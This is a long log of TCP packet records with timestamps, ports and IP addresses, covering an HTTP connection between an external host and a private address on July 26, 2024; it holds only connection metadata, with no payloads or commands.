Jul 26, 2024 18:56:41.146245956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.146272898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.146294117 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.146467924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.146470070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.146472931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.146478891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.146491051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.146503925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.146511078 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.146514893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.146526098 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.146527052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.146539927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.146541119 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.147258997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.147294044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.147298098 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.147298098 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.147311926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.147334099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.147339106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.147368908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.147373915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.147402048 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.147418976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.147450924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.147456884 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.147485971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.147489071 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.147522926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.209750891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.209810019 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.209830046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.209837914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.209863901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.209877968 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.209939003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.209975958 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.210309029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.210352898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.210550070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.210568905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.210587025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.210592031 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.210607052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.210607052 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.210624933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.210624933 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.210644007 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.210659981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.210798025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.210813999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.210838079 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.210860968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.210875034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.210882902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.210896969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.210916996 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.211199045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.211215019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.211234093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.211239100 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.211253881 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.211268902 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.211334944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.211354971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.211369991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.211371899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.211389065 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.211390972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.211407900 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.211407900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.211424112 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.211430073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.211443901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.211451054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.211464882 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.211471081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.211486101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.211505890 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.211935043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.211951017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.211966038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.211975098 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.211986065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.211990118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.212006092 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.212023020 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.212218046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.212224007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.212263107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.212363958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.212383986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.212403059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.212412119 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.212423086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.212425947 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.212440014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.212445021 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.212460995 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.212461948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.212476969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.212479115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.212496042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.212522984 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.212527037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.212547064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.212562084 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.212563992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.212583065 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.212584019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.212598085 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.212618113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.213438034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.213460922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.213479996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.213488102 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.213501930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.213502884 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.213521004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.213527918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.213535070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.213535070 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.213546991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.213560104 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.213567019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.213582039 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.213587999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.213601112 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.213606119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.213624954 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.213627100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.213639021 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.213644981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.213661909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.213664055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.213679075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.213685036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.213692904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.213720083 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.214291096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.214315891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.214335918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.214338064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.214354038 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.214355946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.214375973 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.214385033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.214406013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.214407921 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.214418888 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.214427948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.214442015 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.214451075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.214462042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.214477062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.214489937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.214498043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.214513063 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.214519024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.214533091 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.214546919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.214555979 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.214567900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.214581966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.214602947 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.215395927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.215426922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.215444088 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.215446949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.215461969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.215470076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.215481043 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.215485096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.215502024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.215502977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.215518951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.215518951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.215537071 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.215537071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.215550900 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.215554953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.215569973 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.215573072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.215588093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.215594053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.215606928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.215611935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.215627909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.215643883 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.235599995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.235636950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.235650063 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.235652924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.235671997 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.235687971 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.235815048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.235831976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.235847950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.235853910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.235866070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.235867977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.235884905 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.235899925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.236098051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.236114025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.236129045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.236133099 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.236149073 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.236155033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.236165047 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.236174107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.236187935 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.236190081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.236207008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.236207008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.236221075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.236224890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.236242056 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.236242056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.236260891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.236279964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.236872911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.236890078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.236905098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.236913919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.236922026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.236927032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.236938953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.236942053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.236955881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.236963034 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.236972094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.236978054 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.236987114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.236995935 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.237010002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.237020969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.237032890 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.237032890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.237068892 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.302723885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.302766085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.302787066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.302812099 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.302829027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.302956104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.302973986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.302992105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.303004980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.303026915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.303117037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.303132057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.303148985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.303160906 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.303165913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.303181887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.303184986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.303203106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.303205013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.303226948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.303245068 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.303689957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.303703070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.303714037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.303725004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.303735018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.303738117 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.303746939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.303762913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.303767920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.303778887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.303781033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.303792953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.303805113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.303805113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.303817034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.303828955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.303832054 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.303843021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.303867102 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.303867102 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.303885937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.305772066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.305784941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.305794954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.305807114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.305816889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.305819988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.305831909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.305844069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.305850029 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.305855036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.305857897 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.305867910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.305879116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.305891037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.305892944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.305917978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.305952072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.305968046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.305978060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.305990934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306000948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306011915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306015968 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.306024075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306032896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.306032896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.306036949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306049109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306060076 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.306060076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306073904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306085110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306085110 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.306097984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306098938 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.306122065 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.306140900 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.306317091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306359053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.306479931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306492090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306503057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306514025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306520939 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.306524992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306536913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306540012 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.306549072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.306560040 CEST	80	49757	147.45.44.104	192.168.2.4
